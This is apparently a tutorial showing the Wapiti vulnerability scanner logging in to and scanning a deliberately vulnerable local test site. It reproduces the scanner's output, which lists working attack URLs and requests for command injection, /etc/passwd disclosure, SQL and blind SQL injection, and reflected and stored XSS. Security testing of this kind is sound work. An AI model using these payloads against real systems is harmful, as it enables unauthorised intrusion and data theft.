
Wapiti Example

The document describes using various tools like wapiti-getcookie and wapiti to scan a vulnerable website located at http://127.0.0.1/vuln/ for security vulnerabilities. The scan found vulnerabilities like command injection, file disclosure, SQL injection, XSS, and more across various scripts on the site. Detailed information is provided on how to exploit each vulnerability including any parameters or URLs that can be used for attacks.
Copyright
© Attribution Non-Commercial (BY-NC)

First, I use wapiti-getcookie to log in to the restricted area and get the cookie in cookies.json:

bash-4.2$ python bin/wapiti-getcookie /tmp/cookies.json http://127.0.0.1/vuln/login.php
<Cookie PHPSESSID=OLPNLIEBPEFELBIFGMKJEKOD for 127.0.0.1/>
Please enter values for the following form:
url = http://127.0.0.1/vuln/login.php
username (default) : admin
password (letmein) : secret
<Cookie PHPSESSID=OLPNLIEBPEFELBIFGMKJEKOD for 127.0.0.1/>

It can also be done with wapiti-cookie this way:

python bin/wapiti-cookie /tmp/cookies.json http://127.0.0.1/vuln/login.php username=admin password=secret

Then, I scan the vulnerable website using the cookie and excluding the logout script:

bash-4.2$ wapiti http://127.0.0.1/vuln/ -c cookies.json -x http://127.0.0.1/vuln/logout.php
Wapiti-2.3.0 (wapiti.sourceforge.net)

Note
========
This scan has been saved in the file /home/audit/.wapiti/scans/127.0.0.1.xml
You can use it to perform attacks without scanning again the web site with the "-k" parameter
[*] Loading modules:
mod_crlf, mod_exec, mod_file, mod_sql, mod_xss, mod_backup, mod_htaccess, mod_blindsql, mod_permanentxss, mod_nikto

[+] Launching module exec
Command execution in http://127.0.0.1/vuln/exec/system.php via injection in the parameter host
  Evil url: http://127.0.0.1/vuln/exec/system.php?host=%3Benv
Command execution in http://127.0.0.1/vuln/exec/passthru.php via injection in the parameter host
  Evil url: http://127.0.0.1/vuln/exec/passthru.php?host=%3Benv
Timeout occured in http://127.0.0.1/vuln/exec/shell_exec.php
  Evil url: http://127.0.0.1/vuln/exec/shell_exec.php?host=a%60sleep%20600%60
Received a HTTP 500 error in http://127.0.0.1/vuln/exec/eval.php
  Evil url: http://127.0.0.1/vuln/exec/eval.php?code=%3Benv
PHP evaluation in http://127.0.0.1/vuln/exec/eval.php via injection in the parameter code
  Evil url: http://127.0.0.1/vuln/exec/eval.php?code=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F

[+] Launching module file
Received a HTTP 500 error in http://127.0.0.1/vuln/exec/eval.php
  Evil url: http://127.0.0.1/vuln/exec/eval.php?code=%2Fetc%2Fpasswd
Linux local file disclosure vulnerability in http://127.0.0.1/vuln/include/include_get_simple.php via injection in the parameter f
  Evil url: http://127.0.0.1/vuln/include/include_get_simple.php?f=%2Fetc%2Fpasswd
File disclosure vulnerability in include_path in http://127.0.0.1/vuln/include/readfile_get_simple.php via injection in the parameter f
  Evil url: http://127.0.0.1/vuln/include/readfile_get_simple.php?f=.depdb
Linux local file disclosure vulnerability in http://127.0.0.1/vuln/include/include_get_post_conditional.php?id=2 via injection in the parameter f
  Evil request:
    POST /vuln/include/include_get_post_conditional.php?id=2 HTTP/1.1
    Host: 127.0.0.1
    Referer: http://127.0.0.1/vuln/include/include_get_post_conditional.php?id=2
    Content-Type: application/x-www-form-urlencoded

    f=%2Fetc%2Fpasswd

[+] Launching module sql
Received a HTTP 500 error in http://127.0.0.1/vuln/exec/eval.php
  Evil url: http://127.0.0.1/vuln/exec/eval.php?code=%BF%27%22%28
MySQL Injection in http://127.0.0.1/vuln/sql/login.php via injection in the parameter login
  Evil url: http://127.0.0.1/vuln/sql/login.php?login=%BF%27%22%28&password=test
MySQL Injection in http://127.0.0.1/vuln/sql/login.php via injection in the parameter password
  Evil url: http://127.0.0.1/vuln/sql/login.php?login=test&password=%BF%27%22%28
MySQL Injection in http://127.0.0.1/vuln/sql/login_post.php via injection in the parameter login
  Evil request:
    POST /vuln/sql/login_post.php HTTP/1.1
    Host: 127.0.0.1
    Referer: http://127.0.0.1/vuln/sql/login_post.php
    Content-Type: application/x-www-form-urlencoded

    login=%BF%27%22%28&password=letmein
MySQL Injection in http://127.0.0.1/vuln/sql/login_post.php via injection in the parameter password
  Evil request:
    POST /vuln/sql/login_post.php HTTP/1.1
    Host: 127.0.0.1
    Referer: http://127.0.0.1/vuln/sql/login_post.php
    Content-Type: application/x-www-form-urlencoded

    login=default&password=%BF%27%22%28

[+] Launching module xss
XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_get.php via injection in the parameter vuln
  Evil url: http://127.0.0.1/vuln/xss/xss_in_get.php?firstname=James&vuln=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%27w3xanau7e6%27%29%3C%2Fscript%3E&lastname=Bond
XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_get_text_script.php via injection in the parameter vuln
  Evil url: http://127.0.0.1/vuln/xss/xss_in_get_text_script.php?vuln=String.fromCharCode%280%2Cwv503afd6b%2C1%29
XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_get_noscript.php via injection in the parameter vuln
  Evil url: http://127.0.0.1/vuln/xss/xss_in_get_noscript.php?vuln=%3C%2Ftextarea%3E%3C%2Fp%3E%3C%2Fdiv%3E%3C%2Fnoscript%3E%3Cscript%3Ealert%28%27wfalvx3r3y%27%29%3C%2Fscript%3E
XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_get_if_cond.php via injection in the parameter vuln
  Evil url: http://127.0.0.1/vuln/xss/xss_in_get_if_cond.php?vuln=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%27wjl4df7rtf%27%29%3C%2Fscript%3E&id=2
XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_query_string.php via injection in the query string
  Evil url: http://127.0.0.1/vuln/xss/xss_in_query_string.php?%3Cscript%3Ealert%28%27w1jnjlqhnq%27%29%3C%2Fscript%3E
XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_php_self.php via injection in the resource path
  Evil url: http://127.0.0.1/vuln/xss/xss_in_php_self.php/%3Cscript%3Ephpselfxss()%3C/script%3E
XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_get_direct.php via injection in the parameter vuln
  Evil url: http://127.0.0.1/vuln/xss/permanent_xss_in_get_direct.php?firstname=James&lastname=Bond&vuln=%3Cscript%3Ealert%28%27wrb6hruotv%27%29%3C%2Fscript%3E
XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_post.php via injection in the parameter vuln
  Evil request:
    POST /vuln/xss/xss_in_post.php HTTP/1.1
    Host: 127.0.0.1
    Referer: http://127.0.0.1/vuln/xss/xss_in_post.php
    Content-Type: application/x-www-form-urlencoded

    firstname=James&lastname=Bond&vuln=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%27w1f181ucnr%27%29%3C%2Fscript%3E
XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_post_direct.php via injection in the parameter vuln
  Evil request:
    POST /vuln/xss/permanent_xss_in_post_direct.php HTTP/1.1
    Host: 127.0.0.1
    Referer: http://127.0.0.1/vuln/xss/permanent_xss_in_post_direct.php
    Content-Type: application/x-www-form-urlencoded

    firstname=James&lastname=Bond&vuln=%3Cscript%3Ealert%28%27wz00qm40jx%27%29%3C%2Fscript%3E
XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_post_url.php?style=%22%3E%3C%2Fdiv%3E%3Cscript%3Ealert%28%27wpk5q4ybjo%27%29%3C%2Fscript%3E via injection in the parameter style
  Evil request:
    POST /vuln/xss/xss_in_post_url.php?style=%22%3E%3C%2Fdiv%3E%3Cscript%3Ealert%28%27wpk5q4ybjo%27%29%3C%2Fscript%3E HTTP/1.1
    Host: 127.0.0.1
    Referer: http://127.0.0.1/vuln/xss/xss_in_post_url.php
    Content-Type: application/x-www-form-urlencoded

    username=Enter%20your%20username

[+] Launching module blindsql
Received a HTTP 500 error in http://127.0.0.1/vuln/exec/eval.php
  Evil url: http://127.0.0.1/vuln/exec/eval.php?code=sleep%287%29%231
Blind SQL vulnerability in http://127.0.0.1/vuln/sql/login_blind.php via injection in the parameter login
  Evil url: http://127.0.0.1/vuln/sql/login_blind.php?login=%27%20or%20sleep%287%29%231&password=test
Blind SQL vulnerability in http://127.0.0.1/vuln/sql/login_blind.php via injection in the parameter password
  Evil url: http://127.0.0.1/vuln/sql/login_blind.php?login=test&password=%27%20or%20sleep%287%29%231
Blind SQL vulnerability in http://127.0.0.1/vuln/sql/login_post_blind.php via injection in the parameter login
  Evil request:
    POST /vuln/sql/login_post_blind.php HTTP/1.1
    Host: 127.0.0.1
    Referer: http://127.0.0.1/vuln/sql/login_post_blind.php
    Content-Type: application/x-www-form-urlencoded

    login=%27%20or%20sleep%287%29%231&password=letmein
Blind SQL vulnerability in http://127.0.0.1/vuln/sql/login_post_blind.php via injection in the parameter password
  Evil request:
    POST /vuln/sql/login_post_blind.php HTTP/1.1
    Host: 127.0.0.1
    Referer: http://127.0.0.1/vuln/sql/login_post_blind.php
    Content-Type: application/x-www-form-urlencoded

    login=default&password=%27%20or%20sleep%287%29%231

[+] Launching module permanentxss
Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_post.php via injection in the parameter vuln
  Evil request:
    POST /vuln/xss/permanent_xss_in_post.php HTTP/1.1
    Host: 127.0.0.1
    Referer: http://127.0.0.1/vuln/xss/permanent_xss_in_post.php
    Content-Type: application/x-www-form-urlencoded

    firstname=James&lastname=Bond&vuln=%3Cscript%3Ealert%28%27w1rc0mzxmd%27%29%3C%2Fscript%3E
Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_post_direct.php via injection in the parameter vuln
  Evil request:
    POST /vuln/xss/permanent_xss_in_post_direct.php HTTP/1.1
    Host: 127.0.0.1
    Referer: http://127.0.0.1/vuln/xss/permanent_xss_in_post_direct.php
    Content-Type: application/x-www-form-urlencoded

    firstname=James&lastname=Bond&vuln=%3Cscript%3Ealert%28%27wz00qm40jx%27%29%3C%2Fscript%3E
Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_get.php via injection in the parameter vuln
  Evil url: http://127.0.0.1/vuln/xss/permanent_xss_in_get.php?firstname=James&lastname=Bond&vuln=%3Cscript%3Ealert%28%27we37lsoicn%27%29%3C%2Fscript%3E
Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_get_direct.php via injection in the parameter vuln
  Evil url: http://127.0.0.1/vuln/xss/permanent_xss_in_get_direct.php?firstname=James&lastname=Bond&vuln=wrb6hruotv
Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_get_direct.php via injection in the parameter vuln
  Evil url: http://127.0.0.1/vuln/xss/permanent_xss_in_get_direct.php?firstname=James&lastname=Bond&vuln=wrb6hruotv
Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_post_result_elsewhere_submit.php via injection in the parameter vuln
  Evil request:
    POST /vuln/xss/permanent_xss_in_post_result_elsewhere_submit.php HTTP/1.1
    Host: 127.0.0.1
    Referer: http://127.0.0.1/vuln/xss/permanent_xss_in_post_result_elsewhere.php
    Content-Type: application/x-www-form-urlencoded

    firstname=James&lastname=Bond&vuln=%3Cscript%3Ealert%28%27wewjm7d17s%27%29%3C%2Fscript%3E

Report
-----
A report has been generated in the file /home/audit/.wapiti/generated_report
Open /home/audit/.wapiti/generated_report/index.html with a browser to see this report.
